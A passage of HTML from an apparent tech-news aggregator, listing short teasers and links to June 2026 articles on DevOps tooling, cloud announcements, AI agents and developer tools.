              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>In the beginning of April, three attacks detected in the Guardicore Global Sensor Network (GGSN) caught our attention. All three had source IP addresses originating in South-Africa and hosted by Volum</p>
<p><strong>📅 Jun 22, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/the-nansh0u-campaign-hackers-arsenal-grows-stronger"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-new-convergence-how-value-stream-mapping-is-rewiring-product-platform-and-devops-for-2026-and-beyond" class="group relative scroll-mt-24">
        <a href="#h3-the-new-convergence-how-value-stream-mapping-is-rewiring-product-platform-and-devops-for-2026-and-beyond" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The New Convergence: How Value Stream Mapping is Rewiring Product, Platform and DevOps for 2026 and Beyond
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-new-convergence-how-value-stream-mapping-is-rewiring-product-platform-and-devops-for-2026-and-beyond"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Value Stream Mapping (VSM) has re-emerged as the connective tissue that unifies product management, operations and architecture.</p>
<p><strong>📅 Jun 22, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/the-new-convergence-how-value-stream-mapping-is-rewiring-product-platform-and-devops-for-2026-and-beyond/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-retirement-of-azure-devops-issuer-in-workload-identity-federation-service-connections" class="group relative scroll-mt-24">
        <a href="#h3-retirement-of-azure-devops-issuer-in-workload-identity-federation-service-connections" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Retirement of Azure DevOps issuer in Workload identity federation service connections
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-retirement-of-azure-devops-issuer-in-workload-identity-federation-service-connections"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>We are announcing the deprecation of the Azure DevOps issuer in workload identity federation (WIF) service connections, with planned retirement on July 1, 2027. The Azure DevOps issuer uses the https:</p>
<p><strong>📅 Jun 22, 2026</strong> • <strong>📰 Azure DevOps Blog</strong></p>
<p><a href="https://devblogs.microsoft.com/devops/retirement-of-azure-devops-issuer-in-workload-identity-federation-service-connections/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-feature-flag-orchestration-with-aws-devops-agent-and-launchdarkly" class="group relative scroll-mt-24">
        <a href="#h3-feature-flag-orchestration-with-aws-devops-agent-and-launchdarkly" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Feature Flag Orchestration with AWS DevOps Agent and LaunchDarkly
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-feature-flag-orchestration-with-aws-devops-agent-and-launchdarkly"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Introduction Organizations that use feature flags alongside incident response tooling often connect the two manually. When an outage occurs, engineers must identify which flags are relevant, decide wh</p>
<p><strong>📅 Jun 19, 2026</strong> • <strong>📰 AWS DevOps Blog</strong></p>
<p><a href="https://aws.amazon.com/blogs/devops/feature-flag-orchestration-with-aws-devops-agent-and-launchdarkly/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-supercharge-your-cloud-operations-with-the-kiro-power-for-aws-devops-agent" class="group relative scroll-mt-24">
        <a href="#h3-supercharge-your-cloud-operations-with-the-kiro-power-for-aws-devops-agent" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Supercharge your cloud operations with the Kiro power for AWS DevOps Agent
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-supercharge-your-cloud-operations-with-the-kiro-power-for-aws-devops-agent"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>When an alarm fires at 2 AM, the first thing most engineers do is grep logs, check recent deployments, and trace code paths. However, the context they need — metrics, traces, topology, configurations </p>
<p><strong>📅 Jun 19, 2026</strong> • <strong>📰 AWS DevOps Blog</strong></p>
<p><a href="https://aws.amazon.com/blogs/devops/supercharge-your-cloud-operations-with-the-kiro-power-for-aws-devops-agent/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-accelerate-incident-resolution-with-pagerduty-and-aws-devops-agent" class="group relative scroll-mt-24">
        <a href="#h3-accelerate-incident-resolution-with-pagerduty-and-aws-devops-agent" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Accelerate Incident Resolution with PagerDuty and AWS DevOps Agent
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-accelerate-incident-resolution-with-pagerduty-and-aws-devops-agent"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>When something breaks in production, you find out fast. Understanding why it broke, before the damage spreads, is the hard part. That is where Site Reliability Engineering (SRE) teams lose the most ti</p>
<p><strong>📅 Jun 19, 2026</strong> • <strong>📰 AWS DevOps Blog</strong></p>
<p><a href="https://aws.amazon.com/blogs/devops/accelerate-incident-resolution-with-pagerduty-and-aws-devops-agent/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-whats-new-with-google-cloud" class="group relative scroll-mt-24">
        <a href="#h3-whats-new-with-google-cloud" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 What’s new with Google Cloud
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-whats-new-with-google-cloud"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Want to know the latest from Google Cloud? Find it here in one handy location. Check back regularly for our newest updates, announcements, resources, events, learning opportunities, and more. Tip: Not</p>
<p><strong>📅 Jun 19, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/topics/inside-google-cloud/whats-new-google-cloud/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-temporary-cloudflare-accounts-for-ai-agents" class="group relative scroll-mt-24">
        <a href="#h3-temporary-cloudflare-accounts-for-ai-agents" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Temporary Cloudflare Accounts for AI agents
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-temporary-cloudflare-accounts-for-ai-agents"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>The moment an agent needs to deploy something, it slams face-first into a wall built for humans. Today we&#39;re rolling out Temporary Accounts on Cloudflare Workers. Any agent can now run wrangler deploy</p>
<p><strong>📅 Jun 19, 2026</strong> • <strong>📰 Cloudflare Blog</strong></p>
<p><a href="https://blog.cloudflare.com/temporary-accounts/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-announcing-the-general-availability-of-a-new-aws-local-zone-in-hanoi-vietnam" class="group relative scroll-mt-24">
        <a href="#h3-announcing-the-general-availability-of-a-new-aws-local-zone-in-hanoi-vietnam" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Announcing the general availability of a new AWS Local Zone in Hanoi, Vietnam
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-announcing-the-general-availability-of-a-new-aws-local-zone-in-hanoi-vietnam"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Today, AWS announces the general availability of a new Local Zone in Hanoi, Vietnam, bringing AWS infrastructure closer to end users. This new Local Zone is one of the first AWS Local Zones in the Asi</p>
<p><strong>📅 Jun 19, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/06/aws-local-zones-hanoi-vietnam/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-amazon-ecs-announces-faster-service-auto-scaling" class="group relative scroll-mt-24">
        <a href="#h3-amazon-ecs-announces-faster-service-auto-scaling" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Amazon ECS announces faster service auto scaling
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-amazon-ecs-announces-faster-service-auto-scaling"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Amazon ECS service auto scaling now detects and responds to load changes faster with support for high resolution (20-second) metrics and metric publishing optimizations. In AWS benchmarking tests, tim</p>
<p><strong>📅 Jun 18, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/06/amazon-ecs-faster-autoscaling/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-misc" class="group relative scroll-mt-24">
        <a href="#h2-misc" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📰 Misc
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-misc"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-visual-studio-code-1126" class="group relative scroll-mt-24">
        <a href="#h3-visual-studio-code-1126" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Visual Studio Code 1.126
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-visual-studio-code-1126"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Learn what&#39;s new in Visual Studio Code 1.126 (Insiders) Read the full article</p>
<p><strong>📅 Jun 24, 2026</strong> • <strong>📰 VS Code Blog</strong></p>
<p><a href="https://code.visualstudio.com/updates/v1_126"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-how-we-measure-the-roi-of-jetbrains-ides" class="group relative scroll-mt-24">
        <a href="#h3-how-we-measure-the-roi-of-jetbrains-ides" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 How We Measure the ROI of JetBrains IDEs
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-how-we-measure-the-roi-of-jetbrains-ides"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Organizations already spend hundreds of thousands of dollars on software, so it’s only natural that when they evaluate new paid tools, one question is top of mind: “Will this actually pay off?” Our RO</p>
<p><strong>📅 Jun 22, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/research/2026/06/how-we-measure-the-roi-of-jetbrains-ides/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-ten-great-devops-job-opportunities" class="group relative scroll-mt-24">
        <a href="#h3-ten-great-devops-job-opportunities" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Ten Great DevOps Job Opportunities
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-ten-great-devops-job-opportunities"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>DevOps.com is now providing a weekly DevOps jobs report through which opportunities for DevOps professionals will be highlighted as part of an effort to better serve our audience. Our goal in these ch</p>
<p><strong>📅 Jun 22, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/ten-great-devops-job-opportunities-11/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-why-every-devops-engineer-is-suddenly-learning-mcp" class="group relative scroll-mt-24">
        <a href="#h3-why-every-devops-engineer-is-suddenly-learning-mcp" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Why Every DevOps Engineer is Suddenly Learning MCP
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-why-every-devops-engineer-is-suddenly-learning-mcp"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Before they were everywhere, developers spent ages stitching systems together, one by one. APIs changed everything. MCP wants to do the same for AI.</p>
<p><strong>📅 Jun 22, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/why-every-devops-engineer-is-suddenly-learning-mcp/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-ubuntu-summit-2604-connected-by-open-source" class="group relative scroll-mt-24">
        <a href="#h3-ubuntu-summit-2604-connected-by-open-source" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Ubuntu Summit 26.04: connected by open source
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-ubuntu-summit-2604-connected-by-open-source"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>What an incredible experience! Ubuntu Summit 26.04 has officially drawn to a close, but the energy from our global community is still buzzing – in the comments section, on social media, and in news re</p>
<p><strong>📅 Jun 22, 2026</strong> • <strong>📰 Ubuntu Blog</strong></p>
<p><a href="https://ubuntu.com//blog/ubuntu-summit-26-04-connected-by-open-source"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-nvidia-research-bets-on-code-not-tool-calls-to-fix-ai-spatial-reasoning" class="group relative scroll-mt-24">
        <a href="#h3-nvidia-research-bets-on-code-not-tool-calls-to-fix-ai-spatial-reasoning" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 NVIDIA Research Bets on Code, Not Tool Calls, to Fix AI Spatial Reasoning
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-nvidia-research-bets-on-code-not-tool-calls-to-fix-ai-spatial-reasoning"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>NVIDIA&#39;s SpatialClaw uses code, not tool calls, to boost AI spatial reasoning by 11.2 points across 20 benchmarks and six model sizes.</p>
<p><strong>📅 Jun 22, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/nvidia-research-bets-on-code-not-tool-calls-to-fix-ai-spatial-reasoning/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-php-version-migration-that-doesnt-break-everything" class="group relative scroll-mt-24">
        <a href="#h3-php-version-migration-that-doesnt-break-everything" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 PHP Version Migration That Doesn’t Break Everything
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-php-version-migration-that-doesnt-break-everything"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>PHP Version Migration Demo PHP powers 71.8% of all websites with a known server-side language. It is a living language that underpins a significant portion of the modern web and one that keeps getting</p>
<p><strong>📅 Jun 22, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/qodana/2026/06/php-version-migration/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-your-agent-wants-to-search-like-a-2010-quant" class="group relative scroll-mt-24">
        <a href="#h3-your-agent-wants-to-search-like-a-2010-quant" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Your agent wants to search like a 2010 quant
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-your-agent-wants-to-search-like-a-2010-quant"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>AI agents need the right information to work well. Whether they manage to find it is the difference between success The post Your agent wants to search like a 2010 quant appeared first on The New Stac</p>
<p><strong>📅 Jun 21, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/search-like-2010-quant/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-an-agent-is-an-llm-and-a-harness-what-nvidia-really-thinks-about-openclaw" class="group relative scroll-mt-24">
        <a href="#h3-an-agent-is-an-llm-and-a-harness-what-nvidia-really-thinks-about-openclaw" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 “An agent is an LLM and a harness”: What Nvidia really thinks about OpenClaw
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-an-agent-is-an-llm-and-a-harness-what-nvidia-really-thinks-about-openclaw"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>How much of Nvidia is reflected by their visionary CEO, Jenson Huang? With his praise and later support of OpenClaw, The post “An agent is an LLM and a harness”: What Nvidia really thinks about OpenCl</p>
<p><strong>📅 Jun 21, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/nvidia-openclaw-agent-blueprints/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-gemini-cli-vs-antigravity-what-works-not-the-spec-sheet" class="group relative scroll-mt-24">
        <a href="#h3-gemini-cli-vs-antigravity-what-works-not-the-spec-sheet" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Gemini CLI vs. Antigravity: What works, not the spec sheet
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-gemini-cli-vs-antigravity-what-works-not-the-spec-sheet"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Google has decommissioned its Gemini CLI, the open-source terminal tool that just shipped last year. It had over 100,000 GitHub The post Gemini CLI vs. Antigravity: What works, not the spec sheet appe</p>
<p><strong>📅 Jun 20, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/gemini-cli-antigravity-replacement/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-striped-lvm-on-linux-concept-setup-extension-xfs-alignment" class="group relative scroll-mt-24">
        <a href="#h3-striped-lvm-on-linux-concept-setup-extension-xfs-alignment" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Striped LVM on Linux — Concept, Setup, Extension & XFS Alignment
        </a>
        <button 
